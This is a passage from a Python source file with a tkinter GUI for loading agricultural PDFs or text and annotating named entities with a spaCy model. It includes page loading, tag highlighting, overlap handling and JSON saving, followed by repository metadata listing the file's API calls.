GeeksForGeeks, they're wonderful\n all_spaces = [i for i in range(len(old_entry)) if old_entry.startswith(\" \", i)]\n entry = \"\"\n for i in range(0, len(old_entry)):\n if not(i in all_spaces):\n entry = entry + old_entry[i] \n elif not(old_entry[i-1] == \"-\" or old_entry[i+1] == \"-\" or old_entry[i+1] == \" \"):\n entry = entry + old_entry[i]\n # Past this point, only single spaces that aren't next to a dash should exist.\n if(self.is_spaced_range(entry)):\n self.msg.config(text=\"You have entered two numbers with spacing in between. 
Loading those pages and the pages between them.\", foreground=\"orange\")\n entry = entry.replace(\" \", \"-\")\n # Replace user entry with how the program has read it.\n self.page_entry.delete(0, tk.END)\n self.page_entry.insert(0, entry)\n return entry\n\n def load_page_from_button(self, event=None):\n \"\"\"\n Loading the page can cause warnings to pop up at the bottom, especially with ranges.\n If you press \"load data\" and the warning from your last page load is still there, it\n can look like you just got an error even though you didn't. Thus, pressing the button\n to load the page first clears any warnings.\n \"\"\"\n self.msg.config(text=\"\")\n self.load_page()\n\n def load_page(self):\n \"\"\"\n Load contents of a PDF or text file into text box.\n\n If the entry box for page number has a value, it will load the page specified. If not, by default it will\n load the first page.\n \"\"\"\n # TODO: Currently only loads 1 page. Update to load arbitrary number of pages (max=size of document).\n # TODO: Give users the option to load text files in addition to pdf files.\n # TODO: Update self.annotation_file. This becomes an issue if a user opened an annotation file and then decides\n # to annotate a new page. The old annotation file name will be in self.annotation_file which can result in a\n # user overwriting the file\n\n if self.raw_file is None:\n self.msg.config(text=\"No raw data file has been selected. Please select a file to load.\", foreground=\"red\")\n # Abort; continuing without a raw file would fail below when the file is read.\n return\n\n # Reset annotation dictionary\n self.cust_ents_dict = {}\n\n # Delete contents\n self.text.delete(1.0, tk.END)\n\n # Calls pyxpdf in case the file is a PDF, otherwise reads as txt\n if self.file_mode == \"pdf\":\n page_num = self.clean_spaces_in_page_entry(self.page_entry.get())\n page_num_valid = self.page_num_is_valid(page_num)\n if page_num_valid == False:\n self.msg.config(text=\"Valid page number not entered. 
Value initialized to 1\", foreground=\"red\")\n self.page_number = 1\n self.page_entry.delete(0,tk.END)\n self.page_entry.insert(0, str(self.page_number))\n self.chunk=self.page_number\n elif page_num_valid == True:\n self.page_number = int(page_num)\n self.chunk=self.page_number\n else: # Range of numbers\n self.handle_page_range(page_num)\n\n # Load PDF file\n if self.pdf_document is None:\n self.pdf_document = Document(self.raw_file.name)\n\n self.handle_bad_page_requests(page_num_valid)\n\n if not (page_num_valid == -1): # Single page, whether page_num_valid is true or false\n page = self.pdf_document[self.page_number - 1]\n # \f doesn't necessarily have to be removed for a single page; It gets removed in\n # the else because tagging across multiple pages doesn't work correctly if \f exists.\n # However, it's removed here as well for consistency and neatness.\n txt = page.text().replace(\"\\r\", \"\").replace(\"\f\", \"\")\n else: # Page range\n txt = \"\"\n for page in self.pdf_document[self.page_number[0] - 1 : self.page_number[1]]:\n txt = txt + page.text().replace(\"\\r\", \"\").replace(\"\f\", \"\")\n else:\n self.page_number = 0\n self.chunk = self.page_number\n txt = self.raw_file.read().replace(\"\\r\", \"\").replace(\"\f\", \"\")\n self.raw_file.seek(0)\n\n self.text.insert(1.0,txt)\n return txt\n\n def update_scrolled_text_line_content_index(self):\n \"\"\"\n Populate the dictionary self.scrolled_text_line_content_index with position indices for the first and\n last characters in each line in the text box.\n\n Trying to figure out where entities are on scrollTextbox is a little tricky because tKinter uses newline\n characters to split text. Here we are keeping track of how many characters appear before a line in the\n GUI. This should make it easier to figure out where a token is given its\n start and end indices. Given (Steveland/Luther//Wintermalt 1001 1029 PED) named entity, we know the first\n character is at position 1001 and the last character is at position 1029. Question is, where is it in the\n textbox? This dictionary will have line number as the key and a tuple\n (index of first char in line, index of last char in line) as values e.g., {1: (0, 113), 2: (114, 228). This\n dictionary tells you the first line has the first 113 characters and the second line has characters starting\n with index 114 up to index 228.\n \"\"\"\n input_text = self.text.get(1.0, \"end\")\n lines = input_text.splitlines()\n line_no = 1\n num_char = 0\n for line in lines:\n line_len = len(line)\n interval = (num_char, num_char + line_len)\n self.scrolled_text_line_content_index[line_no] = interval\n num_char = num_char + line_len + 1 # The 1 we are adding is for newline character\n line_no = line_no + 1\n\n def highlight_ent(self, start_char: int, end_char: int, label: str):\n \"\"\"\n Given the start index and end index of a named entity, highlight it in the text box.\n\n Expects the dictionary (self.scrolled_text_line_content_index) with indices for characters in each line in\n the text box to be specified. 
The label for the named entity needs to have been added to\n self.text.tag_configure.\n \"\"\"\n line_start = -1\n char_start = -1\n line_end = -1\n char_end = -1\n # Loop through lines in the text field and find where this tag is.\n for key, value in self.scrolled_text_line_content_index.items():\n (start, end) = value\n if start_char >= start:\n line_start = key\n char_start = start_char - start\n if end_char <= end and line_start > 0:\n line_end = key\n ent_num_char = end_char - start_char\n if line_start == line_end:\n char_end = char_start + ent_num_char\n else:\n char_end = end_char - start\n break\n\n self.text.tag_add(label, str(line_start) + \".\" + str(char_start), str(line_end) + \".\" + str(char_end))\n\n def pre_tag(self, selection: str):\n \"\"\"\n Pre-tag selected content or all the text in text box with NER tags.\n\n Parameters\n ----------\n selection : str\n String specifying the type tagging to be done.\n\n If a user has selected a block of text and clicked the \"Pre-Tag Selection\" button, the selected text will be\n tagged and annotation displayed in the text box.\n\n If they clicked the \"Pre-Tag Pages(s)\" button, all the text loaded in the text box will be annotated.\n \"\"\"\n # Clear warning message, if one exists\n self.msg.config(text=\"\")\n\n # Checks if there is an active NER model\n if self.model_dir is None:\n self.msg.config(text=\"Warning!! Unable to pre-tag. No NER model selected.\", foreground=\"red\")\n # Pre-tag with NER model\n else:\n if selection == \"selection\":\n if (len(self.text.tag_ranges(\"sel\")) > 0):\n input_text = self.text.get(\"sel.first\", \"sel.last\")\n else:\n self.msg.config(text=\"No selection detected; no text was tagged.\", foreground=\"red\")\n return\n else:\n if self.raw_file is None:\n self.msg.config(text=\"Warning!! No PDF or txt file was detected. Attempting to tag what's currently in the text box.\", foreground=\"red\")\n # Will pre-tag whatever's in the current text box without trying to load data.\n input_text = self.text.get(1.0, \"end\")\n else:\n input_text = self.load_page()\n\n if not self.json_initialized:\n self.initialize_new_file() \n\n self.text.delete(1.0, tk.END)\n self.text.insert(1.0, input_text)\n\n # Reset annotation dictionary\n self.cust_ents_dict = {}\n\n # Update variable that holds number of lines in textbox. 
You need this for\n # the function highlight_ent to work\n self.update_scrolled_text_line_content_index()\n doc = self.tag_ner_with_spacy(input_text)\n\n custom_tags_present = False\n\n if type(self.page_number) is list:\n page_start = self.page_number[0]\n else:\n page_start = self.page_number\n\n for ent in doc.ents:\n # NER is in our list of custom tags\n if ent.label_ in self.tags:\n custom_tags_present = True\n # index = self.tags.index(ent.label_) # Find index for an element in a list\n self.highlight_ent(ent.start_char, ent.end_char, ent.label_)\n if self.cust_ents_dict.get(page_start, False):\n self.cust_ents_dict[page_start].append((ent.start_char, ent.end_char, ent.label_))\n else:\n self.cust_ents_dict[page_start] = [(ent.start_char, ent.end_char, ent.label_)]\n\n if not custom_tags_present:\n self.msg.config(text=\"No custom agriculture tags detected in the text!\", foreground=\"red\")\n if len(doc.ents) == 0:\n self.msg.config(text=\"No entities detected in the text!\", foreground=\"red\")\n\n if self.cust_ents_dict.get(page_start, False):\n tags = self.cust_ents_dict[page_start]\n self.cust_ents_dict[page_start] = [input_text, tags]\n\n def overlap(self, interval_one: list, interval_two: list) -> bool:\n \"\"\"\n Check to see if two intervals overlap.\n\n Parameters\n ----------\n interval_one : list[start1, end1]\n List containing two int values [start1, end1].\n\n interval_two : list[start2, end2]\n List containing two int values [start2, end2].\n\n Returns\n -------\n bool\n True if the intervals overlap and False otherwise.\n \"\"\"\n overlap = False\n interval_one_start = interval_one[0]\n interval_one_end = interval_one[1]\n\n interval_two_start = interval_two[0]\n interval_two_end = interval_two[1]\n\n if (interval_two_start >= interval_one_start) and (interval_two_start < interval_one_end):\n overlap = True\n elif (interval_two_end > interval_one_start) and (interval_two_end <= interval_one_end):\n overlap = True\n elif (interval_two_start <= interval_one_start) and (interval_two_end >= interval_one_end):\n overlap = True\n return overlap\n\n def initialize_new_file(self):\n self.json_initialized = True\n self.working_file_label.config(text=\"Working Annotation File: Untitled.json\")\n self.date_entry.config(state=tk.NORMAL)\n self.date_entry.delete(0, tk.END)\n self.date_entry.insert(0, datetime.now().strftime(\"%m_%d_%Y_%H_%M_%S\"))\n self.date_entry.config(state=tk.DISABLED)\n\n def get_selected_interval(self) -> tuple:\n \"\"\"\n Determines the index of the first and last characters (char_start, char_end) selected by the user.\n\n Returns\n -------\n tuple\n Indices of first and last characters selected (char_start, char_end) .\n \"\"\"\n\n selection_start_line = int(self.text.index(\"sel.first\").split(\".\")[0])\n tmp_selection_start = int(self.text.index(\"sel.first\").split(\".\")[1])\n selection_start = self.scrolled_text_line_content_index[selection_start_line][0] + tmp_selection_start\n\n selection_end_line = int(self.text.index(\"sel.last\").split(\".\")[0])\n tmp_selection_end = int(self.text.index(\"sel.last\").split(\".\")[1])\n selection_end = self.scrolled_text_line_content_index[selection_end_line][0] + tmp_selection_end\n result = (selection_start, selection_end)\n return result\n\n def get_ner(self, tag_label: str):\n \"\"\"\n Tag a piece of text that has been selected as a named entity.\n\n Parameters\n ----------\n tag_label : str\n Label to assign to the named entity that was selected.\n \"\"\"\n\n # Clear warning message, if one exists\n 
self.msg.config(text=\"\")\n try:\n # Get text\n input_text = self.text.get(1.0, \"end\")\n\n # Update variable that holds number of lines in textbox.\n self.update_scrolled_text_line_content_index()\n\n # Get indices for the first and last characters selected\n (ent_char_start, ent_char_end) = self.get_selected_interval()\n\n if self.cust_ents_dict.get(self.chunk,False):\n # Check to see if the current text matches the one we have in the annotation dictionary.\n # If not, warn the user about the conflict and make the update\n if input_text != self.cust_ents_dict[self.chunk][0]:\n self.msg.config(text=\"Warning!! Text in annotation dictionary was different. It has been updated\",\n foreground=\"red\")\n self.cust_ents_dict[self.chunk][0] = input_text\n\n # Check if selected area overlaps with another NER tag. If it does,\n # delete the existing tag. SpaCy does not allow NER tags to overlap.\n new_ents = []\n for (start, end, label) in self.cust_ents_dict[self.chunk][1]:\n if not self.overlap([ent_char_start, ent_char_end], [start, end]):\n new_ents.append((start, end, label))\n self.cust_ents_dict[self.chunk][1] = new_ents\n\n # Add the new NER tag into the dictionary\n self.cust_ents_dict[self.chunk][1].append((ent_char_start,ent_char_end, tag_label))\n else:\n self.initialize_new_file()\n self.cust_ents_dict[self.chunk] = [input_text, [(ent_char_start,ent_char_end, tag_label)]]\n\n # Highlight the new NER tag\n self.text.tag_add(tag_label, \"sel.first\", \"sel.last\")\n\n except tk.TclError:\n self.msg.config(text=\"Warning!! get_ner error.\", foreground=\"red\")\n\n def remove_tag(self):\n \"\"\"\n Untag a piece of text that was classified as a named entity.\n\n Extract the piece of text that was selected and remove it from the list of named entities.\n \"\"\"\n\n # Clear warning message, if one exists\n self.msg.config(text=\"\")\n\n # Get indices for the first and last characters selected\n try:\n (selection_start, selection_end) = self.get_selected_interval()\n except:\n self.msg.config(text=\"No selection detected!\", foreground=\"red\")\n return\n\n new_ents = []\n overlapping_tags = []\n input_text = self.cust_ents_dict[self.chunk][0]\n entities = self.cust_ents_dict[self.chunk][1]\n\n # Loop through tags and find ones that overlap with selected region and remove them.\n for (start, end, label) in entities:\n if not self.overlap([selection_start, selection_end], [start, end]):\n new_ents.append((start, end, label))\n else:\n overlapping_tags.append((start, end, label))\n if len(overlapping_tags) == 0:\n self.msg.config(text=\"Warning!! 
It appears the region you selected (\"+str(selection_start)+\n \"-\"+str(selection_end)+\") did not overlap with a tag.\", foreground=\"red\")\n else:\n for (start, end, label) in overlapping_tags:\n # Removes tag using the tag's actual indices instead of the selection's indices\n self.text.tag_remove(label, f\"1.0+{start}c\", f\"1.0+{end}c\")\n\n new_ents.sort()\n self.cust_ents_dict[self.chunk] = [input_text, new_ents]\n\n def get_custom_labels(self, data: dict):\n \"\"\"\n Given a dictionary representing the entirety of a json file generated by this program,\n this method finds every custom, user-defined label and loads them back into the program.\n \"\"\"\n labels = []\n for sentence_item in data['sentences']:\n for entity_item in data['sentences'][sentence_item]:\n label = data['sentences'][sentence_item][entity_item]['label']\n if (not (label in labels)) and (not (label in self.tags)):\n # If a new tag is found, essentially auto-fill the custom trait field and press the button to add a custom entity.\n labels.append(label)\n self.trait_entry.delete(0, tk.END)\n self.trait_entry.insert(0, label)\n self.add_ent()\n self.trait_entry.delete(0, tk.END)\n\n def review_annotations(self):\n \"\"\"\n Load a json file containing annotations and review it.\n\n It does not take as input any parameters, but it expects the variable that hold annotation\n file name (self.annotation_file) to have a valid json file value.\n \"\"\"\n\n # Clear warning message, if one exists\n self.msg.config(text=\"\")\n\n if self.annotation_file is None:\n self.msg.config(text=\"Please select an annotations file (json)\", foreground=\"red\")\n else:\n # Load annotation data\n try:\n data = json_2_dict(self.annotation_file.name)\n train_data = dict_2_mixed_type(data)\n self.get_custom_labels(data)\n except:\n self.msg.config(text=\"WARNING!!: Couldn't load data from annotation file. 
Are you sure you loaded a valid json?\", foreground=\"red\")\n self.annotation_file = None\n return\n \"\"\"\n doc = data['doc']\n url = data['url']\n \"\"\"\n\n # Updates the 'metadata' panel with information from json file, if info is different or invalid then the user is instructed to verify the data in a proper format.\n try:\n self.doc_entry.delete(0, tk.END)\n self.doc_entry.insert(0, data['doc'])\n self.url_entry.delete(0, tk.END)\n self.url_entry.insert(0, data['url'])\n self.date_entry.config(state=tk.NORMAL)\n self.date_entry.delete(0, tk.END)\n self.date_entry.insert(0, data['date'])\n self.date_entry.config(state=tk.DISABLED)\n except:\n self.msg.config(text=\"Error retrieving metadata; please verify metadata manually\", foreground=\"red\")\n self.date_entry.config(state=tk.NORMAL)\n\n\n self.chunk = int(data['chunk'])\n self.page_number = self.chunk\n\n # Empty text box so we can load annotations\n self.text.delete(1.0, tk.END)\n\n annotated_text = None\n entities = None\n\n # Annotation file that contains more than one text block\n if len(train_data) > 1:\n total_num_char = 0\n annotated_text = \"\"\n entities = []\n for text_annotation in train_data:\n annotated_text_tmp = text_annotation[0]\n entities_tmp = text_annotation[1]['entities']\n for ent_tmp in entities_tmp:\n entities.append((total_num_char + ent_tmp[0],total_num_char + ent_tmp[1], ent_tmp[2]))\n total_num_char = total_num_char + len(annotated_text_tmp) + 1\n annotated_text = annotated_text + annotated_text_tmp + \"\\n\"\n self.cust_ents_dict[self.chunk] = [annotated_text, entities]\n else:\n text_annotation = train_data[0]\n annotated_text = text_annotation[0]\n entities = text_annotation[1]['entities']\n self.cust_ents_dict[self.chunk] = [annotated_text,entities]\n\n self.text.insert(1.0, annotated_text + '\\n')\n\n # Update variable that holds number of lines in textbox. 
You need this update\n # for highlight_ent to work\n self.update_scrolled_text_line_content_index()\n\n for ent_val in entities:\n self.highlight_ent(ent_val[0],ent_val[1], ent_val[2])\n\n def clear_message(self):\n \"\"\"\n Clear warning message\n \"\"\"\n self.msg.config(text=\"\")\n\n def clear_data(self):\n \"\"\"\n Clear data in text box and dictionary containing annotations.\n \"\"\"\n # Clear annotations\n self.cust_ents_dict = {}\n\n # Clear warning message\n self.msg.config(text=\"\")\n\n # Clear content\n self.text.delete(1.0, tk.END)\n\n def remove_all_tags(self):\n \"\"\"\n Remove all the NER tags on text loaded in the text box.\n \"\"\"\n for tag in self.tags:\n self.text.tag_remove(tag, \"1.0\", \"end\")\n\n # Clear annotations\n self.cust_ents_dict = {}\n\n # Clear warning message\n self.msg.config(text=\"\")\n\n def tag_ner_with_spacy(self, text: str) -> spacy.tokens.Doc:\n \"\"\"\n Use NLP pipeline to identify named entities in the text.\n \"\"\"\n doc = self.nlp_agdata(text)\n return doc\n\n def file_save(self):\n \"\"\"\n Brings up a file dialog to choose a file name/location then saves annotations to it in .json format.\n \"\"\"\n\n if self.cust_ents_dict:\n # Opens a tkinter save as file dialog and stores the file to a var\n json_file = fd.asksaveasfile(initialfile=self.file_name.split(\".\")[0]+\"_pg\"+str(self.page_number)+\".json\", mode='w', defaultextension='.json')\n\n if json_file is None or json_file.name[-4:] != \"json\":\n self.msg.config(text=\"Invalid file or no file chosen; annotations not saved.\", foreground=\"red\")\n return\n else:\n self.annotation_file = json_file\n self.working_file_label.config(text=\"Working Annotation File: \"+str(self.annotation_file.name.split(\"/\")[-1]))\n\n input_text = self.cust_ents_dict[self.chunk][0]\n entities = self.cust_ents_dict[self.chunk][1]\n\n # Calls dict_2_json on the newly created json file\n ann_train_dict = mixed_type_2_dict([(input_text,{'entities': entities})], self.chunk, self.doc_entry.get(), self.url_entry.get(), self.date_entry.get())\n dict_2_json_file(ann_train_dict, json_file)\n\n json_file.close()\n self.msg.config(text=\"Data successfully saved!\", foreground=\"orange\")\n else:\n self.msg.config(text=\"No NER data detected to save\", foreground=\"red\")\n\n\n def next_page(self):\n \"\"\"\n Load the next page.\n \"\"\"\n if self.file_mode == \"pdf\":\n if len(self.cust_ents_dict) == 0:\n self.msg.config(text=\"Warning!! No annotations to save.\", foreground=\"red\")\n else:\n self.msg.config(text=\"\")\n # Save current annotation\n # Uncomment this for now. Initially it seemed like a good idea but there are a lot of\n # Instances where a user might not want to save annotations when they click next page\n # self.file_save()\n\n # Increment page number\n try:\n self.page_number = self.page_number + 1\n self.page_entry.delete(0, tk.END)\n self.page_entry.insert(0, str(self.page_number))\n\n # Reset annotation data\n self.annotation_file = None\n\n # Load data\n self.load_page()\n except TypeError:\n # While this would be easy to add, it's not clear what exactly SHOULD be incremented\n # if the user clicks \"next page\" on a range, so that's left to the user.\n self.msg.config(text=\"WARNING!! Cannot increment a range of pages.\", foreground=\"red\")\n else:\n self.msg.config(text=\"Warning!! 
No PDF is currently loaded, so the next page of it can't be loaded either.\", foreground=\"red\")\n\n def go(self):\n \"\"\"\n Start running the GUI running.\n \"\"\"\n self.rootWin.mainloop()\n\n def quit(self):\n \"\"\"\n Callback method attached to the quit button.\n\n It check for unsaved changes and opens a save dialog window, otherwise it destroys the main window, which ends the program\n \"\"\"\n # Creates a save dialog window if there are annotations in the workspace\n if self.cust_ents_dict:\n\n # Button for saving and quitting that invokes save dialog\n def save_and_quit():\n \"\"\"\n Callback method attached to the save and quit button in the save dialog window.\n \"\"\"\n self.file_save()\n self.rootWin.destroy()\n\n # Button for discaring changes and quitting\n def discard_and_quit():\n \"\"\"\n Callback method attached to the discard and quit button in the save dialog window.\n \"\"\"\n self.rootWin.destroy()\n\n self.save_dialog = tk.Toplevel(self.rootWin)\n label = tk.Label(self.save_dialog, text=\"You currently have annotations in the workspace. Would you like to save or discard them?\")\n label.pack(side=tk.TOP)\n savedialog_discard = tk.Button(self.save_dialog, text=\"Discard and Quit\", command=discard_and_quit)\n savedialog_discard.pack(side=tk.BOTTOM)\n savedialog_confirm = tk.Button(self.save_dialog, text=\"Save\", command=save_and_quit)\n savedialog_confirm.pack(side=tk.BOTTOM)\n else:\n self.rootWin.destroy()\n\n\n\n# Driver code\nif __name__ == \"__main__\":\n ner_gui = CropNerGUI()\n ner_gui.go()\n", "repo_name": "getiria-onsongo/IaaAgDataNER", "sub_path": "src/CropNerGUI.py", "file_name": "CropNerGUI.py", "file_ext": "py", "file_size_in_byte": 64512, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tkinter.Tk", "line_number": 158, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 186, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 187, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 191, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 192, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 215, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 216, "usage_type": "call"}, {"api_name": "platform.system", "line_number": 220, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 222, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 226, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 227, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 230, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 231, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 232, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 235, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 236, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 239, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 239, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 240, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 243, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 244, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 248, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 249, "usage_type": "attribute"}, 
{"api_name": "tkinter.Label", "line_number": 252, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 253, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 256, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 257, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 260, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 261, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 264, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 265, "usage_type": "attribute"}, {"api_name": "tkinter.Entry", "line_number": 268, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 269, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 272, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 273, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 276, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 277, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 280, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 281, "usage_type": "attribute"}, {"api_name": "tkinter.scrolledtext.ScrolledText", "line_number": 285, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 287, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 290, "usage_type": "call"}, {"api_name": "tkinter.RIGHT", "line_number": 291, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 294, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 296, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 298, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 300, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 302, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 304, "usage_type": "call"}, {"api_name": "tkinter.CENTER", "line_number": 304, "usage_type": "attribute"}, {"api_name": "tkinter.DISABLED", "line_number": 306, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 317, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 318, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 320, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 321, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 323, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 324, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 326, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 327, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 329, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 330, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 332, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 333, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 335, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 336, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 338, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 339, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 342, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 343, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 345, "usage_type": "call"}, 
{"api_name": "tkinter.LEFT", "line_number": 346, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 349, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 350, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 352, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 353, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 355, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 356, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 357, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 359, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 361, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 363, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 364, "usage_type": "attribute"}, {"api_name": "tkinter.Entry", "line_number": 365, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 366, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 369, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 370, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 371, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 373, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 374, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 376, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 377, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 428, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 437, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 440, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 441, "usage_type": "call"}, {"api_name": "platform.system", "line_number": 442, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 444, "usage_type": "attribute"}, {"api_name": "tkinter.LEFT", "line_number": 490, "usage_type": "attribute"}, {"api_name": "tkinter.TOP", "line_number": 491, "usage_type": "attribute"}, {"api_name": "tkinter.TOP", "line_number": 492, "usage_type": "attribute"}, {"api_name": "tkinter.TOP", "line_number": 493, "usage_type": "attribute"}, {"api_name": "tkinter.TOP", "line_number": 494, "usage_type": "attribute"}, {"api_name": "tkinter.TOP", "line_number": 495, "usage_type": "attribute"}, {"api_name": "tkinter.TOP", "line_number": 496, "usage_type": "attribute"}, {"api_name": "tkinter.TOP", "line_number": 498, "usage_type": "attribute"}, {"api_name": "tkinter.filedialog.askdirectory", "line_number": 519, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 519, "usage_type": "name"}, {"api_name": "spacy.tokens.load", "line_number": 526, "usage_type": "call"}, {"api_name": "spacy.tokens", "line_number": 526, "usage_type": "name"}, {"api_name": "spacy.tokens.load", "line_number": 532, "usage_type": "call"}, {"api_name": "spacy.tokens", "line_number": 532, "usage_type": "name"}, {"api_name": "tkinter.filedialog.askopenfile", "line_number": 566, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 566, "usage_type": "name"}, {"api_name": "tkinter.END", "line_number": 593, "usage_type": "attribute"}, {"api_name": "tkinter.LEFT", "line_number": 598, "usage_type": "attribute"}, {"api_name": "tkinter.LEFT", "line_number": 599, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 
613, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 615, "usage_type": "attribute"}, {"api_name": "tkinter.NORMAL", "line_number": 616, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 617, "usage_type": "attribute"}, {"api_name": "tkinter.DISABLED", "line_number": 619, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 659, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 664, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 680, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 688, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 694, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 699, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 721, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 762, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 796, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 805, "usage_type": "attribute"}, {"api_name": "pyxpdf.Document", "line_number": 816, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 933, "usage_type": "attribute"}, {"api_name": "tkinter.NORMAL", "line_number": 1006, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 1007, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 1008, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1008, "usage_type": "name"}, {"api_name": "tkinter.DISABLED", "line_number": 1009, "usage_type": "attribute"}, {"api_name": "tkinter.TclError", "line_number": 1078, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 1132, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 1135, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 1167, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 1169, "usage_type": "attribute"}, {"api_name": "tkinter.NORMAL", "line_number": 1171, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 1172, "usage_type": "attribute"}, {"api_name": "tkinter.DISABLED", "line_number": 1174, "usage_type": "attribute"}, {"api_name": "tkinter.NORMAL", "line_number": 1177, "usage_type": 